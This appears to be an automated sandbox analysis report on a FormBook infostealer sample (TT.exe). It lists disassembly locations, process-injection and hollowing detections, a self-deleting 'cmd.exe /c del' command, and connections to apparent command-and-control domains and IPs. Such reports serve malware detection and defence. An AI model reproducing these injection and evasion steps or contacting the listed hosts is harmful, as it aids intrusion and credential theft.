          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3002D mov eax, dword ptr fs:[00000030h]7_2_04D3002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3BC2C mov eax, dword ptr fs:[00000030h]7_2_04D3BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov eax, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov eax, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov eax, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov ecx, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov eax, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D86DC9 mov eax, dword ptr fs:[00000030h]7_2_04D86DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DB8DF1 mov eax, dword ptr fs:[00000030h]7_2_04DB8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]7_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]7_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]7_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D941E8 mov eax, dword ptr fs:[00000030h]7_2_04D941E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1D5E0 mov eax, dword ptr fs:[00000030h]7_2_04D1D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1D5E0 mov eax, dword ptr fs:[00000030h]7_2_04D1D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCFDE2 mov eax, dword ptr fs:[00000030h]7_2_04DCFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCFDE2 mov eax, dword ptr fs:[00000030h]7_2_04DCFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCFDE2 mov eax, dword ptr fs:[00000030h]7_2_04DCFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCFDE2 mov eax, dword ptr fs:[00000030h]7_2_04DCFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32990 mov eax, dword ptr fs:[00000030h]7_2_04D32990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3FD9B mov eax, dword ptr fs:[00000030h]7_2_04D3FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3FD9B mov eax, dword ptr fs:[00000030h]7_2_04D3FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2C182 mov eax, dword ptr fs:[00000030h]7_2_04D2C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32581 mov eax, dword ptr fs:[00000030h]7_2_04D32581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32581 mov eax, dword ptr fs:[00000030h]7_2_04D32581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32581 mov eax, dword ptr fs:[00000030h]7_2_04D32581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32581 mov eax, dword ptr fs:[00000030h]7_2_04D32581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3A185 mov eax, dword ptr fs:[00000030h]7_2_04D3A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D02D8A mov eax, dword ptr fs:[00000030h]7_2_04D02D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D02D8A mov eax, dword ptr fs:[00000030h]7_2_04D02D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D02D8A mov eax, dword ptr fs:[00000030h]7_2_04D02D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D02D8A mov eax, dword ptr fs:[00000030h]7_2_04D02D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D02D8A mov eax, dword ptr fs:[00000030h]7_2_04D02D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D31DB5 mov eax, dword ptr fs:[00000030h]7_2_04D31DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D31DB5 mov eax, dword ptr fs:[00000030h]7_2_04D31DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D31DB5 mov eax, dword ptr fs:[00000030h]7_2_04D31DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D851BE mov eax, dword ptr fs:[00000030h]7_2_04D851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D851BE mov eax, dword ptr fs:[00000030h]7_2_04D851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D851BE mov eax, dword ptr fs:[00000030h]7_2_04D851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D851BE mov eax, dword ptr fs:[00000030h]7_2_04D851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD05AC mov eax, dword ptr fs:[00000030h]7_2_04DD05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD05AC mov eax, dword ptr fs:[00000030h]7_2_04DD05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D335A1 mov eax, dword ptr fs:[00000030h]7_2_04D335A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D361A0 mov eax, dword ptr fs:[00000030h]7_2_04D361A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D361A0 mov eax, dword ptr fs:[00000030h]7_2_04D361A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D869A6 mov eax, dword ptr fs:[00000030h]7_2_04D869A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D27D50 mov eax, dword ptr fs:[00000030h]7_2_04D27D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2B944 mov eax, dword ptr fs:[00000030h]7_2_04D2B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2B944 mov eax, dword ptr fs:[00000030h]7_2_04D2B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D43D43 mov eax, dword ptr fs:[00000030h]7_2_04D43D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D83540 mov eax, dword ptr fs:[00000030h]7_2_04D83540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0B171 mov eax, dword ptr fs:[00000030h]7_2_04D0B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0B171 mov eax, dword ptr fs:[00000030h]7_2_04D0B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2C577 mov eax, dword ptr fs:[00000030h]7_2_04D2C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2C577 mov eax, dword ptr fs:[00000030h]7_2_04D2C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0C962 mov eax, dword ptr fs:[00000030h]7_2_04D0C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09100 mov eax, dword ptr fs:[00000030h]7_2_04D09100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09100 mov eax, dword ptr fs:[00000030h]7_2_04D09100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09100 mov eax, dword ptr fs:[00000030h]7_2_04D09100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0AD30 mov eax, dword ptr fs:[00000030h]7_2_04D0AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D13D34 mov eax, dword ptr fs:[00000030h]7_2_04D13D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCE539 mov eax, dword ptr fs:[00000030h]7_2_04DCE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D34D3B mov eax, dword ptr fs:[00000030h]7_2_04D34D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D34D3B mov eax, dword ptr fs:[00000030h]7_2_04D34D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D34D3B mov eax, dword ptr fs:[00000030h]7_2_04D34D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD8D34 mov eax, dword ptr fs:[00000030h]7_2_04DD8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3513A mov eax, dword ptr fs:[00000030h]7_2_04D3513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3513A mov eax, dword ptr fs:[00000030h]7_2_04D3513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D8A537 mov eax, dword ptr fs:[00000030h]7_2_04D8A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D24120 mov eax, dword ptr fs:[00000030h]7_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D24120 mov eax, dword ptr fs:[00000030h]7_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D24120 mov eax, dword ptr fs:[00000030h]7_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D24120 mov eax, dword ptr fs:[00000030h]7_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D24120 mov ecx, dword ptr fs:[00000030h]7_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD8ED6 mov eax, dword ptr fs:[00000030h]7_2_04DD8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D48EC7 mov eax, dword ptr fs:[00000030h]7_2_04D48EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32ACB mov eax, dword ptr fs:[00000030h]7_2_04D32ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DBFEC0 mov eax, dword ptr fs:[00000030h]7_2_04DBFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D336CC mov eax, dword ptr fs:[00000030h]7_2_04D336CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D316E0 mov ecx, dword ptr fs:[00000030h]7_2_04D316E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D176E2 mov eax, dword ptr fs:[00000030h]7_2_04D176E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32AE4 mov eax, dword ptr fs:[00000030h]7_2_04D32AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3D294 mov eax, dword ptr fs:[00000030h]7_2_04D3D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3D294 mov eax, dword ptr fs:[00000030h]7_2_04D3D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D9FE87 mov eax, dword ptr fs:[00000030h]7_2_04D9FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]7_2_04D1AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]7_2_04D1AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3FAB0 mov eax, dword ptr fs:[00000030h]7_2_04D3FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D052A5 mov eax, dword ptr fs:[00000030h]7_2_04D052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D052A5 mov eax, dword ptr fs:[00000030h]7_2_04D052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D052A5 mov eax, dword ptr fs:[00000030h]7_2_04D052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D052A5 mov eax, dword ptr fs:[00000030h]7_2_04D052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D052A5 mov eax, dword ptr fs:[00000030h]7_2_04D052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]7_2_04DD0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]7_2_04DD0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]7_2_04DD0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D846A7 mov eax, dword ptr fs:[00000030h]7_2_04D846A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCEA55 mov eax, dword ptr fs:[00000030h]7_2_04DCEA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D94257 mov eax, dword ptr fs:[00000030h]7_2_04D94257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09240 mov eax, dword ptr fs:[00000030h]7_2_04D09240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09240 mov eax, dword ptr fs:[00000030h]7_2_04D09240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09240 mov eax, dword ptr fs:[00000030h]7_2_04D09240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D09240 mov eax, dword ptr fs:[00000030h]7_2_04D09240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D17E41 mov eax, dword ptr fs:[00000030h]7_2_04D17E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCAE44 mov eax, dword ptr fs:[00000030h]7_2_04DCAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCAE44 mov eax, dword ptr fs:[00000030h]7_2_04DCAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2AE73 mov eax, dword ptr fs:[00000030h]7_2_04D2AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2AE73 mov eax, dword ptr fs:[00000030h]7_2_04D2AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2AE73 mov eax, dword ptr fs:[00000030h]7_2_04D2AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2AE73 mov eax, dword ptr fs:[00000030h]7_2_04D2AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2AE73 mov eax, dword ptr fs:[00000030h]7_2_04D2AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4927A mov eax, dword ptr fs:[00000030h]7_2_04D4927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DBB260 mov eax, dword ptr fs:[00000030h]7_2_04DBB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DBB260 mov eax, dword ptr fs:[00000030h]7_2_04DBB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1766D mov eax, dword ptr fs:[00000030h]7_2_04D1766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD8A62 mov eax, dword ptr fs:[00000030h]7_2_04DD8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D05210 mov eax, dword ptr fs:[00000030h]7_2_04D05210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D05210 mov ecx, dword ptr fs:[00000030h]7_2_04D05210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D05210 mov eax, dword ptr fs:[00000030h]7_2_04D05210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D05210 mov eax, dword ptr fs:[00000030h]7_2_04D05210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0AA16 mov eax, dword ptr fs:[00000030h]7_2_04D0AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0AA16 mov eax, dword ptr fs:[00000030h]7_2_04D0AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D23A1C mov eax, dword ptr fs:[00000030h]7_2_04D23A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3A61C mov eax, dword ptr fs:[00000030h]7_2_04D3A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3A61C mov eax, dword ptr fs:[00000030h]7_2_04D3A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0C600 mov eax, dword ptr fs:[00000030h]7_2_04D0C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0C600 mov eax, dword ptr fs:[00000030h]7_2_04D0C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0C600 mov eax, dword ptr fs:[00000030h]7_2_04D0C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D38E00 mov eax, dword ptr fs:[00000030h]7_2_04D38E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC1608 mov eax, dword ptr fs:[00000030h]7_2_04DC1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D18A0A mov eax, dword ptr fs:[00000030h]7_2_04D18A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DBFE3F mov eax, dword ptr fs:[00000030h]7_2_04DBFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0E620 mov eax, dword ptr fs:[00000030h]7_2_04D0E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D44A2C mov eax, dword ptr fs:[00000030h]7_2_04D44A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D44A2C mov eax, dword ptr fs:[00000030h]7_2_04D44A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D853CA mov eax, dword ptr fs:[00000030h]7_2_04D853CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D853CA mov eax, dword ptr fs:[00000030h]7_2_04D853CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D437F5 mov eax, dword ptr fs:[00000030h]7_2_04D437F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D303E2 mov eax, dword ptr fs:[00000030h]7_2_04D303E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D2DBE9 mov eax, dword ptr fs:[00000030h]7_2_04D2DBE9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3B390 mov eax, dword ptr fs:[00000030h]7_2_04D3B390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D32397 mov eax, dword ptr fs:[00000030h]7_2_04D32397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D18794 mov eax, dword ptr fs:[00000030h]7_2_04D18794
          Source: C:\Users\user\Desktop\TT.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_10001464 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10001464

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.philreid4cc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lagrangewildliferemoval.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.41.236 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sectorulb.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.165.149.13 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TT.exeSection loaded: unknown target: C:\Users\user\Desktop\TT.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TT.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TT.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\TT.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TT.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: B20000Jump to behavior
          Source: C:\Users\user\Desktop\TT.exeProcess created: C:\Users\user\Desktop\TT.exe 'C:\Users\user\Desktop\TT.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TT.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.340378838.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.597591476.0000000003390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.596305048.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 00000007.00000002.597591476.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.340378838.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.597591476.0000000003390000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.340378838.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.597591476.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

